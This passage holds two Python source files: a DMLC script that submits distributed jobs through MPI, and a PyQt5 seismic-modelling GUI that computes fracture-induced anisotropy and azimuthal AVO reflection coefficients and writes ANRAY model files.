dmlc_mpi.py
#!/usr/bin/env python
"""
DMLC submission script, MPI version
"""
import argparse
import sys
import os
import subprocess
import tracker
from threading import Thread
parser = argparse.ArgumentParser(description='DMLC script to submit dmlc job using MPI')
parser.add_argument('-n', '--nworker', required=True, type=int,
                    help = 'number of worker processes to be launched')
parser.add_argument('-s', '--server-nodes', default = 0, type=int,
help = 'number of server nodes to be launched')
parser.add_argument('--log-level', default='INFO', type=str,
choices=['INFO', 'DEBUG'],
help = 'logging level')
parser.add_argument('--log-file', type=str,
help = 'output log to the specific log file')
parser.add_argument('-H', '--hostfile', type=str,
help = 'the hostfile of mpi server')
parser.add_argument('command', nargs='+',
help = 'command for dmlc program')
parser.add_argument('--host-ip', type=str,
help = 'the scheduler ip', default='ip')
args, unknown = parser.parse_known_args()
#
# submission script using MPI
#
def get_mpi_env(envs):
"""get the mpirun command for setting the envornment
support both openmpi and mpich2
"""
outfile="/tmp/mpiver"
os.system("mpirun 1>/tmp/mpiver 2>/tmp/mpiver")
with open (outfile, "r") as infile:
mpi_ver = infile.read()
cmd = ''
if 'Open MPI' in mpi_ver:
for k, v in envs.items():
cmd += ' -x %s=%s' % (k, str(v))
elif 'mpich' in mpi_ver:
for k, v in envs.items():
cmd += ' -env %s %s' % (k, str(v))
else:
        raise Exception('unknown MPI version %s' % (mpi_ver))
return cmd
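# Illustrative example (not part of the original script): with Open MPI installed,
#   get_mpi_env({'DMLC_ROLE': 'worker'})
# returns ' -x DMLC_ROLE=worker'; under MPICH the same call returns
# ' -env DMLC_ROLE worker'.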
def mpi_submit(nworker, nserver, pass_envs):
"""
    customized submit script that submits nworker worker and nserver server jobs;
    each job must receive args as parameters.
    note this can be a lambda function containing additional parameters in input
    Parameters
      nworker   number of worker processes to start up
      nserver   number of server nodes to start up
      pass_envs environment variables to be added to the started programs
"""
def run(prog):
""""""
subprocess.check_call(prog, shell = True)
cmd = ''
if args.hostfile is not None:
cmd = '--hostfile %s' % (args.hostfile)
cmd += ' ' + ' '.join(args.command) + ' ' + ' '.join(unknown)
# start servers
if nserver > 0:
pass_envs['DMLC_ROLE'] = 'server'
prog = 'mpirun -n %d %s %s' % (nserver, get_mpi_env(pass_envs), cmd)
thread = Thread(target = run, args=(prog,))
        thread.daemon = True
thread.start()
if nworker > 0:
pass_envs['DMLC_ROLE'] = 'worker'
prog = 'mpirun -n %d %s %s' % (nworker, get_mpi_env(pass_envs), cmd)
thread = Thread(target = run, args=(prog,))
        thread.daemon = True
thread.start()
tracker.config_logger(args)
tracker.submit(args.nworker, args.server_nodes, fun_submit = mpi_submit,
hostIP=args.host_ip,
pscmd=(' '.join(args.command) + ' ' + ' '.join(unknown)))
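# Example invocation (illustrative; 'hosts.txt' and './dmlc_program' are placeholders,
# not taken from the original source):
#   ./dmlc_mpi.py -n 4 -s 2 -H hosts.txt ./dmlc_program train.conf
# This launches 4 worker and 2 server MPI processes, each with DMLC_ROLE set to
# 'worker' or 'server' in its environment.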
fractureP_S.py
import os
import subprocess
import sys
import threading
import shutil
import numpy as np
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QMessageBox
from matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from sympy import roots
from sympy.abc import x
from fractureP_S_gui import Ui_MainWindow
class MyFirstGuiProgram(Ui_MainWindow):
def __init__(self, dialog):
Ui_MainWindow.__init__(self)
self.setupUi(dialog)
        ### Create the plotting layout
        # figure for Tab1
self.fig = Figure(figsize=(8,3),facecolor='white')
self.fig.subplots_adjust(hspace= 0.40, wspace= 0.60,left=0.10, right=0.98, top=0.88, bottom=0.14)
self.canvas = FigureCanvas(self.fig)
self.canvas.setParent(self.widget)
layout = QtWidgets.QVBoxLayout()
self.widget.setLayout(layout)
layout.addWidget(self.canvas)
self.mpl_toolbar = NavigationToolbar(self.canvas, self.widget)
self.fig.text(0.5, 0.1, 'Geofone', va='center')
self.fig.text(0.02, 0.33, 'Tempo(s)', va='center', rotation='vertical')
self.fig.text(0.45, 0.5, 'Ângulo de incidência (graus)', va='center', size= 8)
self.fig.text(0.02, 0.73, 'Coeficiente de reflexão', va='center', rotation='vertical', size=7)
self.axes = self.fig.add_subplot(211)
self.axes2 = self.axes.twiny()
self.axes.grid()
self.axes_time = self.fig.add_subplot(212)
self.axes.tick_params(labelsize=6)
self.axes2.tick_params(labelsize=6)
self.axes_time.tick_params(labelsize=6)
self.axes_time.grid()
        # figure for tab2
self.fig_anray = Figure(figsize=(9,6), facecolor='white')
self.fig_anray2 = Figure(figsize=(9, 6), facecolor='white')
self.fig_anray.text(0, 0.6, 'Coeficiente de reflexão', va='center', rotation='vertical')
self.fig_anray.text(0.985, 0.6, 'Separação', va='center', rotation='vertical')
self.fig_anray.text(0.5, 0.12, 'Geofone', va='center')
self.fig_anray2.text(0, 0.6, 'Coeficiente de reflexão', va='center', rotation='vertical')
self.fig_anray2.text(0.5, 0.12, 'Geofone', va='center')
self.canvas_anray = FigureCanvas(self.fig_anray)
self.canvas_anray2 = FigureCanvas(self.fig_anray2)
self.canvas_anray.setParent(self.widget_anray)
self.canvas_anray2.setParent(self.widget_anray2)
layout = QtWidgets.QVBoxLayout()
layout2 = QtWidgets.QVBoxLayout()
self.widget_anray.setLayout(layout)
layout.addWidget(self.canvas_anray)
self.widget_anray2.setLayout(layout2)
layout2.addWidget(self.canvas_anray2)
self.mpl_toolbar = NavigationToolbar(self.canvas_anray, self.widget_anray)
self.mpl_toolbar2 = NavigationToolbar(self.canvas_anray2, self.widget_anray2)
self.fig_anray.subplots_adjust(hspace=0.27, left=0.10, right=0.92, top=0.92, bottom=0.18)
self.fig_anray2.subplots_adjust(hspace=0.27, left=0.10, right=0.98, top=0.93, bottom=0.18)
#subplots
self.axes_anray_tot = self.fig_anray.add_subplot(411)
self.axes_anray2_tot = self.fig_anray2.add_subplot(411)
self.axes_anray_tot2 = self.axes_anray_tot.twinx()
self.axes_anray_tot.set_ylabel("total")
self.axes_anray2_tot.set_ylabel("total")
self.axes_anray_rad = self.fig_anray.add_subplot(412)
self.axes_anray2_rad = self.fig_anray2.add_subplot(412)
self.axes_anray_rad.set_ylabel("radial")
self.axes_anray2_rad.set_ylabel("radial")
self.axes_anray_rad2 = self.axes_anray_rad.twinx()
self.axes_anray_z = self.fig_anray.add_subplot(413)
self.axes_anray2_z = self.fig_anray2.add_subplot(413)
self.axes_anray_z.set_ylabel("vertical")
self.axes_anray2_z.set_ylabel("vertical")
self.axes_anray_z2 = self.axes_anray_z.twinx()
self.axes_anray_time = self.fig_anray.add_subplot(414)
self.axes_anray2_time = self.fig_anray2.add_subplot(414)
self.axes_anray_time.set_ylabel('tempo')
self.axes_anray2_time.set_ylabel('tempo')
self.axes_anray_tot.grid()
self.axes_anray_rad.grid()
self.axes_anray2_rad.grid()
self.axes_anray_z.grid()
self.axes_anray_time.grid()
self.axes_anray2_tot.grid()
self.axes_anray2_z.grid()
self.axes_anray2_time.grid()
self.axes_anray_tot.tick_params(labelsize=6)
self.axes_anray_rad.tick_params(labelsize=6)
self.axes_anray2_rad.tick_params(labelsize=6)
self.axes_anray_tot2.tick_params(labelsize=6)
self.axes_anray_rad2.tick_params(labelsize=6)
self.axes_anray_z.tick_params(labelsize=6)
self.axes_anray_z2.tick_params(labelsize=6)
self.axes_anray2_tot.tick_params(labelsize=6)
self.axes_anray2_z.tick_params(labelsize=6)
###
        # figure for tab3
self.fig_sismo = Figure(dpi=50, facecolor='white')
self.canvas_sismo = FigureCanvas(self.fig_sismo)
self.canvas_sismo.setParent(self.widget_sismo)
self.fig_sismo.subplots_adjust(wspace=0.11, left=0.05, right=0.98, top=0.93, bottom=0.10)
layout = QtWidgets.QVBoxLayout()
self.widget_sismo.setLayout(layout)
layout.addWidget(self.canvas_sismo)
self.axes_sismo_x = self.fig_sismo.add_subplot(121)
self.axes_sismo_z = self.fig_sismo.add_subplot(122)
self.mpl_toolbar = NavigationToolbar(self.canvas_sismo, self.widget_sismo)
self.fig_sismo.text(0.48, 0.04, 'Distância (m)', va='center', size= 14)
self.fig_sismo.text(0.01, 0.5, 'Tempo (s)', va='center', rotation='vertical', size= 14)
self.fig_sismo.text(0.25, 0.96, 'Radial', va='center', size= 14)
self.fig_sismo.text(0.75, 0.96, 'Vertical', va='center', size=14)
        # figure for tab4
self.fig_sismo2 = Figure(dpi=100, facecolor='white')
self.canvas_sismo2 = FigureCanvas(self.fig_sismo2)
self.canvas_sismo2.setParent(self.widget_sismo2)
self.fig_sismo2.set_tight_layout(True)
layout = QtWidgets.QVBoxLayout()
self.widget_sismo2.setLayout(layout)
layout.addWidget(self.canvas_sismo2)
self.axes_sismo2_1 = self.fig_sismo2.add_subplot(211)
self.axes_sismo2_2 = self.fig_sismo2.add_subplot(212)
self.mpl_toolbar = NavigationToolbar(self.canvas_sismo2, self.widget_sismo2)
        ### Set the initial values
self.spinBox_vp1.setValue(2250)
self.spinBox_vs1.setValue(1200)
self.spinBox_p1.setValue(2100)
self.spinBox_vp2.setValue(4500)
self.spinBox_vs2.setValue(2500)
self.spinBox_p2.setValue(2700)
        # Velocities from the Ruger (1997) model (for testing)
# self.spinBox_vp1.setValue(2260)
# self.spinBox_vs1.setValue(1428)
# self.spinBox_p1.setValue(2600)
# self.spinBox_vp2.setValue(2485)
# self.spinBox_vs2.setValue(1489)
# self.spinBox_p2.setValue(2700)
self.doubleSpinBox_aspect.setValue(0.01)
self.spinBox_fract.setValue(5)
self.doubleSpinBox_bulk.setValue(2.2)
self.doubleSpinBox_shear.setValue(0)
self.spinBox_thick.setValue(100)
self.spinBox_ngeo.setValue(48)
self.spinBox_rmin.setValue(20)
self.spinBox_rstep.setValue(2)
self.size = 0
self.size_plot = 0
self.time_basalto =0
self.time_solo = 0
self.refl_tot_0 = 0
self.refl_tot_30 = 0
self.refl_tot_45 = 0
self.refl_tot_60 = 0
self.refl_tot_90 = 0
self.refl_x_0 = 0
self.refl_x_30 = 0
self.refl_x_45 = 0
self.refl_x_60 = 0
self.refl_x_90 = 0
self.refl_y_0 = 0
self.refl_y_30 = 0
self.refl_y_45 = 0
self.refl_y_60 = 0
self.refl_y_90 = 0
self.refl_z_0 = 0
self.refl_z_30 = 0
self.refl_z_45 = 0
self.refl_z_60 = 0
self.refl_z_90 = 0
self.refl_solo_rad_0 = 0
self.refl_solo_y_0 = 0
self.refl_solo_z_0 = 0
self.refl_solo_x_30 = 0
self.refl_solo_y_30 = 0
self.refl_solo_z_30 = 0
self.refl_solo_x_45 = 0
self.refl_solo_y_45 = 0
self.refl_solo_z_45 = 0
self.refl_solo_x_60 = 0
self.refl_solo_y_60 = 0
self.refl_solo_z_60 = 0
self.refl_solo_x_90 = 0
self.refl_solo_y_90 = 0
self.refl_solo_z_90 = 0
        self.solo_fase_rad = 0 # for the soil layer the phases are the same at all azimuths...
self.solo_fase_z = 0
self.hti_fase_rad_0 = 0
self.hti_fase_rad_30 = 0
self.hti_fase_rad_45 = 0
self.hti_fase_rad_60 = 0
self.hti_fase_rad_90 = 0
self.hti_fase_z_0 = 0
self.hti_fase_z_30 = 0
self.hti_fase_z_45 = 0
self.hti_fase_z_60 = 0
self.hti_fase_z_90 = 0
self.dn = 0
self.dt = 0
###
        ### Connect the widget signals to their actions
self.spinBox_vp1.valueChanged.connect(self.vp1)
self.spinBox_vp2.valueChanged.connect(self.vp2)
self.spinBox_vs1.valueChanged.connect(self.plot)
self.spinBox_p1.valueChanged.connect(self.plot)
self.spinBox_vp2.valueChanged.connect(self.weak_calc)
self.spinBox_vs2.valueChanged.connect(self.weak_calc)
self.spinBox_p2.valueChanged.connect(self.weak_calc)
self.doubleSpinBox_aspect.valueChanged.connect(self.weak_calc)
self.spinBox_fract.valueChanged.connect(self.slider_pos)
self.doubleSpinBox_aspect.valueChanged.connect(self.slider_pos)
self.doubleSpinBox_bulk.valueChanged.connect(self.weak_calc)
self.doubleSpinBox_shear.valueChanged.connect(self.weak_calc)
self.verticalSlider_fract.valueChanged.connect(self.weak_calc)
self.verticalSlider_aspect.valueChanged.connect(self.slider_pos1)
self.doubleSpinBox_DN.valueChanged.connect(self.slider_pos2)
self.doubleSpinBox_DT.valueChanged.connect(self.slider_pos2)
self.verticalSlider_DN.valueChanged.connect(self.slider_pos3)
self.verticalSlider_DT.valueChanged.connect(self.slider_pos3)
self.doubleSpinBox_d.valueChanged.connect(self.plot)
self.doubleSpinBox_e.valueChanged.connect(self.plot)
self.doubleSpinBox_y.valueChanged.connect(self.plot)
self.spinBox_ngeo.valueChanged.connect(self.plot)
self.spinBox_rmin.valueChanged.connect(self.plot)
self.spinBox_rstep.valueChanged.connect(self.plot)
self.spinBox_thick.valueChanged.connect(self.plot)
self.split_box0_90.stateChanged.connect(self.plot)
self.split_box0_45.stateChanged.connect(self.plot)
self.split_box45_90.stateChanged.connect(self.plot)
self.split_box30_60.stateChanged.connect(self.plot)
self.split_box_anray_0_90.stateChanged.connect(self.split)
self.split_box_anray_0_45.stateChanged.connect(self.split)
self.split_box_anray_30_60.stateChanged.connect(self.split)
self.split_box_anray_45_90.stateChanged.connect(self.split)
self.pushButton.clicked.connect(self.anray)
self.checkBox_solo.pressed.connect(self.activate)
self.checkBox_solo.released.connect(self.plot)
self.pushButton_2.pressed.connect(self.plot)
self.verticalSlider_aspect.valueChanged.connect(self.slider_pos1)
self.sismo_button.clicked.connect(self.plot_sismograma)
self.radioButton_0.toggled.connect(self.plot_sismograma_v)
self.radioButton_30.toggled.connect(self.plot_sismograma_v)
self.radioButton_45.toggled.connect(self.plot_sismograma_v)
self.radioButton_60.toggled.connect(self.plot_sismograma_v)
self.radioButton_90.toggled.connect(self.plot_sismograma_v)
self.radioButton_plot_x.toggled.connect(self.plot_sismo_azim)
self.radioButton_plot_z.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_0_90.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_0_45.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_45_90.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_30_60.toggled.connect(self.plot_sismo_azim)
self.checkBox_solo_sismo.clicked.connect(self.sismo_enable)
self.az_tmin.valueChanged.connect(self.plot_sismo_azim)
self.az_tmax.valueChanged.connect(self.plot_sismo_azim)
self.slider_pos()
self.anray_path = os.getcwd()
if not os.path.exists('HTI_P_S_model'):
os.makedirs('HTI_P_S_model')
def vp1(self):
vp = self.spinBox_vp1.value()
vs = vp/np.sqrt(3)
self.spinBox_vs1.setValue(vs)
def vp2(self):
vp = self.spinBox_vp2.value()
vs = vp/np.sqrt(3)
self.spinBox_vs2.setValue(vs)
def message(self):
msg = QMessageBox()
msg.setIcon(QMessageBox.Warning)
msg.setText("Erro")
msg.setInformativeText("Certifique-se de gerar os arquivos e manter a opção (solo) correspondente na primeira aba.")
msg.exec_()
    # Function to activate the soil layer in the calculations
def activate(self):
if self.checkBox_solo.isChecked():
self.solo_espessura.setDisabled(True)
self.solo_vp.setDisabled(True)
self.solo_vs.setDisabled(True)
self.solo_densidade.setDisabled(True)
else:
self.solo_espessura.setEnabled(True)
self.solo_vp.setEnabled(True)
self.solo_vs.setEnabled(True)
self.solo_densidade.setEnabled(True)
self.pushButton_2.setEnabled(True)
    # Functions to keep the spin boxes and sliders in sync.
def slider_pos(self):
self.verticalSlider_fract.setValue(self.spinBox_fract.value())
def slider_pos1(self):
self.doubleSpinBox_aspect.setValue(self.verticalSlider_aspect.value() / 10000)
def slider_pos2(self):
self.verticalSlider_DN.setValue(self.doubleSpinBox_DN.value()*1000)
self.verticalSlider_DT.setValue(self.doubleSpinBox_DT.value()*1000)
def slider_pos3(self):
self.doubleSpinBox_DN.setValue(self.verticalSlider_DN.value()/1000)
self.doubleSpinBox_DT.setValue(self.verticalSlider_DT.value()/1000)
self.aniso_parameters()
    # Function to compute the fracture weakness parameters
def weak_calc(self):
self.doubleSpinBox_DN.valueChanged.disconnect(self.slider_pos2)
self.doubleSpinBox_DT.valueChanged.disconnect(self.slider_pos2)
self.verticalSlider_DN.valueChanged.disconnect(self.slider_pos3)
self.verticalSlider_DT.valueChanged.disconnect(self.slider_pos3)
        # Adjust the spin box value to match the slider
self.spinBox_fract.setValue(self.verticalSlider_fract.value())
self.verticalSlider_aspect.setValue(self.doubleSpinBox_aspect.value()*10000)
        # crack density and aspect ratio
e = self.spinBox_fract.value() / 100
a = self.doubleSpinBox_aspect.value()
vp2 = self.spinBox_vp2.value()
vs2 = self.spinBox_vs2.value()
p2 = self.spinBox_p2.value()
g = (vs2 ** 2) / (vp2 ** 2)
        # Lamé parameter
mu = p2 * (vs2 ** 2)
# bulk and shear modulus
kl = self.doubleSpinBox_bulk.value() * 10 ** 9
ul = self.doubleSpinBox_shear.value() * 10 ** 9
        # Hudson degree of fracturing. Obtained from Chen 2014 (2) and Bakulin 2000 (14)
DN = 4 * e / (3 * g * (1 - g) * (1 + ((kl + (4 / 3) * ul) / (np.pi * (1 - g) * mu * a))))
self.doubleSpinBox_DN.setValue(DN)
self.verticalSlider_DN.setValue(DN*1000)
DT= 16 * e / (3 * (3 - 2 * g) * (1 + ((4 * ul) / (np.pi * (3 - 2 * g) * mu * a))))
self.doubleSpinBox_DT.setValue(DT)
self.verticalSlider_DT.setValue(DT*1000)
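        # Sketch of the expressions implemented above (Hudson/linear-slip weaknesses;
        # notation inferred from the code, not checked against the cited papers):
        #   dN = 4e / { 3 g (1 - g) [1 + (K' + 4/3 u') / (pi (1 - g) mu a)] }
        #   dT = 16e / { 3 (3 - 2g) [1 + 4 u' / (pi (3 - 2g) mu a)] }
        # with e = crack density, a = aspect ratio, g = (Vs/Vp)^2, mu = rho*Vs^2,
        # and K', u' the bulk and shear moduli of the crack-filling material.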
self.doubleSpinBox_DN.valueChanged.connect(self.slider_pos2)
self.doubleSpinBox_DT.valueChanged.connect(self.slider_pos2)
self.verticalSlider_DN.valueChanged.connect(self.slider_pos3)
self.verticalSlider_DT.valueChanged.connect(self.slider_pos3)
self.aniso_parameters()
    # Function that computes the anisotropy parameters
def aniso_parameters(self):
self.doubleSpinBox_d.valueChanged.disconnect(self.plot)
self.doubleSpinBox_e.valueChanged.disconnect(self.plot)
self.doubleSpinBox_y.valueChanged.disconnect(self.plot)
vp2 = self.spinBox_vp2.value()
vs2 = self.spinBox_vs2.value()
p2 = self.spinBox_p2.value()
DN_H = self.doubleSpinBox_DN.value()
DT_H = self.doubleSpinBox_DT.value()
        # Following Chen 2014 and Bakulin 2000 (27)
        # Lamé parameters
lamb = p2 * (vp2 ** 2 - 2 * (vs2 ** 2))
mu = p2 * (vs2 ** 2)
M = lamb + 2 * mu
r = lamb / M
c11 = M * (1 - DN_H)
c33 = M * (1 - (r ** 2) * DN_H)
c13 = lamb * (1 - DN_H)
c44 = mu
c66 = mu * (1 - DT_H)
c55 = c66
c23 = c33 - 2 * c44
self.c11 = (c11/p2)/1000000
self.c13 = (c13/p2)/1000000
self.c23 = (c23/p2)/1000000
self.c33 = (c33/p2)/1000000
self.c44 = (c44/p2)/1000000
self.c55 = (c55 /p2)/1000000
        # To print the elastic parameters, uncomment the lines below.
# print('A11=', c11/p2)
# print('A13=', c13/p2)
# print('A23=', c23/p2)
# print('A33=', c33/p2)
# print('A44=', c44/p2)
# print('A55=', c55/p2)
self.dn = DN_H
self.dt = DT_H
e2_v = (c11 - c33) / (2 * c33)
self.doubleSpinBox_e.setValue(abs(e2_v))
d2_v = (((c13 + c55) ** 2) - ((c33 - c55) ** 2)) / (2 * c33 * (c33 - c55))
self.doubleSpinBox_d.setValue(abs(d2_v))
y2_v = (c66 - c44) / (2 * c44)
self.doubleSpinBox_y.setValue(abs(y2_v))
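        # e2_v, d2_v and y2_v above are Thomsen-style anisotropy parameters (epsilon,
        # delta, gamma) computed from the effective stiffnesses of the equivalent HTI
        # medium; the spin boxes display their absolute values.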
self.doubleSpinBox_d.valueChanged.connect(self.plot)
self.doubleSpinBox_e.valueChanged.connect(self.plot)
self.doubleSpinBox_y.valueChanged.connect(self.plot)
self.plot()
    # Function that draws the main plot
def plot(self):
self.axes.cla()
self.axes_time.cla()
        # Parameters of the upper medium (1)
vp1 = self.spinBox_vp1.value()
vs1 = self.spinBox_vs1.value()
p1 = self.spinBox_p1.value()
        # Parameters of the lower medium (2)
vp2 = self.spinBox_vp2.value()
vs2 = self.spinBox_vs2.value()
p2 = self.spinBox_p2.value()
        # Vertical impedance
Z1 = p1 * vp1
Z2 = p2 * vp2
        # Shear modulus
G1 = p1 * pow(vs1, 2)
G2 = p2 * pow(vs2, 2)
        # differences and averages
deltaZ = Z2 - Z1
medZ = (Z1 + Z2) / 2
deltaG = G2 - G1
medG = (G1 + G2) / 2
deltavp = vp2 - vp1
medvp = (vp1 + vp2) / 2
deltavs = vs2 - vs1
medvs = (vs1 + vs2) / 2
deltad = -self.doubleSpinBox_d.value()
deltae = -self.doubleSpinBox_e.value()
deltay = self.doubleSpinBox_y.value()
rmin = self.spinBox_rmin.value()
rstep = self.spinBox_rstep.value()
thick = self.spinBox_thick.value()
        # critical angle of incidence
ang_critico = np.arcsin(vp1 / vp2)
ang_critico_graus = ang_critico * 180 / np.pi
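        # Snell's law gives the critical angle theta_c = arcsin(vp1/vp2); it only exists
        # when vp2 > vp1 (otherwise np.arcsin receives an argument > 1 and returns nan).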
ang_text = str(round(ang_critico_graus,1))
self.label_33.setText('Ângulo crítico = ' + ang_text)
        # angle, geophone positions and travel-time calculation
ngeo = self.spinBox_ngeo.value()
if self.checkBox_solo.isChecked():
v1 = self.solo_vp.value()
v2 = self.spinBox_vp1.value()
p1 = self.solo_espessura.value()
p2 = thick
theta_solo, a = self.geofone_to_angle(ngeo, rmin, rstep, p1)
geo, time1 = self.reflect_travel_time(1, p1, theta_solo, v1, 0, 0, 0)
theta = self.geofone_to_angle_2(ngeo, rmin, rstep, v1, v2, p1, p2)
geo, time2 = self.reflect_travel_time(2, p1, 0, v1, p2, theta, v2)
self.time_basalto = time2
self.time_solo = time1
self.axes_time.plot(geo, time1, color= 'brown', label='Solo')
self.axes_time.plot(geo, time2, color= 'blue', label='Basalto')
else:
theta, a = self.geofone_to_angle(ngeo, rmin, rstep, thick)
geo, time = self.reflect_travel_time(1, thick, theta, vp1, 0, 0, 0)
self.time_basalto = time
self.axes_time.plot(geo, time, color= 'blue', label = 'Basalto')
self.axes_time.grid()
self.axes_time.legend(title='Reflexão')
        # Azimuths for the reflection-coefficient calculation
phi1 = 0
phi2 = 30
phi3 = 45
phi4 = 60
phi5 = 90
A = (deltaZ / medZ) / 2
B1 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi1 * np.pi / 180), 2))
C1 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi1 * np.pi / 180), 4) + deltad * pow(np.sin(phi1 * np.pi / 180), 2) * pow(np.cos(phi1 * np.pi / 180), 2))
B2 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi2 * np.pi / 180), 2))
C2 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi2 * np.pi / 180), 4) + deltad * pow(np.sin(phi2 * np.pi / 180), 2) * pow(np.cos(phi2 * np.pi / 180), 2))
B3 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi3 * np.pi / 180), 2))
C3 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi3 * np.pi / 180), 4) + deltad * pow(np.sin(phi3 * np.pi / 180), 2) * pow(np.cos(phi3 * np.pi / 180), 2))
B4 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi4 * np.pi / 180), 2))
C4 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi4 * np.pi / 180), 4) + deltad * pow(np.sin(phi4 * np.pi / 180), 2) * pow(np.cos(phi4 * np.pi / 180), 2))
B5 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi5 * np.pi / 180), 2))
C5 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi5 * np.pi / 180), 4) + deltad * pow(np.sin(phi5 * np.pi / 180), 2) * pow(np.cos(phi5 * np.pi / 180), 2))
B_iso = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG))
C_iso = 0.5 * (deltavp / medvp)
coef_refl1 = A + B1 * pow(np.sin(theta * np.pi / 180), 2) + C1 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_refl2 = A + B2 * pow(np.sin(theta * np.pi / 180), 2) + C2 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
        coef_refl3 = A + B3 * pow(np.sin(theta * np.pi / 180), 2) + C3 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
        coef_refl4 = A + B4 * pow(np.sin(theta * np.pi / 180), 2) + C4 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
        coef_refl5 = A + B5 * pow(np.sin(theta * np.pi / 180), 2) + C5 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_iso = A + B_iso * pow(np.sin(theta * np.pi / 180), 2) + C_iso * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
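        # The curves above follow a Ruger-type azimuthal AVO approximation,
        #   R(theta, phi) ~= A + B(phi) sin^2(theta) + C(phi) sin^2(theta) tan^2(theta),
        # evaluated at azimuths of 0, 30, 45, 60 and 90 degrees; coef_iso is the
        # corresponding isotropic (azimuth-independent) reference curve.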
if self.split_box0_90.isChecked():
dif1= np.zeros(len(coef_refl1))
for i in range(len(coef_refl1)):
if abs(coef_refl5[i]) > abs(coef_refl1[i]):
dif1[i] = abs(coef_refl5[i] - coef_refl1[i]) / abs(coef_refl1[i])
if dif1[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'ro')
self.axes.plot(theta[i], coef_refl5[i], 'ro')
break
else:
dif1[i] = abs(coef_refl1[i] - coef_refl5[i]) / abs(coef_refl5[i])
if dif1[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'ro')
self.axes.plot(theta[i], coef_refl5[i], 'ro')
break
if self.split_box0_45.isChecked():
dif2= np.zeros(len(coef_refl1))
for i in range(len(coef_refl1)):
if abs(coef_refl3[i]) > abs(coef_refl1[i]):
dif2[i] = abs(coef_refl3[i] - coef_refl1[i]) / abs(coef_refl1[i])
if dif2[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'bo')
self.axes.plot(theta[i], coef_refl3[i], 'bo')
break
else:
dif2[i] = abs(coef_refl1[i] - coef_refl3[i]) / abs(coef_refl3[i])
if dif2[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'bo')
self.axes.plot(theta[i], coef_refl3[i], 'bo')
break
if self.split_box45_90.isChecked():
dif3= np.zeros(len(coef_refl3))
for i in range(len(coef_refl3)):
                if abs(coef_refl5[i]) > abs(coef_refl3[i]):
dif3[i] = abs(coef_refl5[i] - coef_refl3[i]) / abs(coef_refl3[i])
if dif3[i] > 0.1:
self.axes.plot(theta[i], coef_refl3[i], 'yo')
self.axes.plot(theta[i], coef_refl5[i], 'yo')
break
else:
dif3[i] = abs(coef_refl3[i] - coef_refl5[i]) / abs(coef_refl5[i])
if dif3[i] > 0.1:
self.axes.plot(theta[i], coef_refl3[i], 'yo')
self.axes.plot(theta[i], coef_refl5[i], 'yo')
break
if self.split_box30_60.isChecked():
dif4= np.zeros(len(coef_refl4))
for i in range(len(coef_refl4)):
if abs(coef_refl4[i]) > abs(coef_refl2[i]):
dif4[i] = abs(coef_refl4[i] - coef_refl2[i]) / abs(coef_refl2[i])
if dif4[i] > 0.1:
self.axes.plot(theta[i], coef_refl2[i], 'go')
self.axes.plot(theta[i], coef_refl4[i], 'go')
break
else:
dif4[i] = abs(coef_refl2[i] - coef_refl4[i]) / abs(coef_refl4[i])
if dif4[i] > 0.1:
self.axes.plot(theta[i], coef_refl4[i], 'go')
self.axes.plot(theta[i], coef_refl2[i], 'go')
break
self.axes.grid()
self.axes.plot(theta, coef_refl1, '+', label='0')
self.axes.plot(theta, coef_refl2, '+', label='30')
self.axes.plot(theta, coef_refl3, '+', label='45')
self.axes.plot(theta, coef_refl4, '+', label='60')
self.axes.plot(theta, coef_refl5, '+', label='90')
self.axes.plot(theta, coef_iso, label='iso', linewidth=2, linestyle='dashed', color='black')
self.axes2.set_xlim(self.axes.get_xlim())
self.axes2.set_xticks(theta)
self.axes2.set_xticklabels(a)
self.axes2.set_xlabel('Distância (m)', size=6)
for label in self.axes2.xaxis.get_ticklabels()[::2]:
label.set_visible(False)
self.axes.legend(title='Azimute', fontsize=6)
self.canvas.draw()
    # Function to generate anray files for the different azimuths (0, 30, 45, 60, 90)
def anray(self):
azimute = np.array([0, 30, 45, 60, 90])
self.anray_file(azimute)
    # Function that writes the anray input file for a specific azimuth.
def anray_file(self, azimute):
azh = azimute
self.size = 0
self.progressBar.setValue(self.size)
for h in azh:
self.size = self.size + 10
self.progressBar.setValue(self.size)
file = open('modelo_anray_%s.modelo' %h, 'w')
file.write("'modelo HTI azimute %s'\n" %(h))
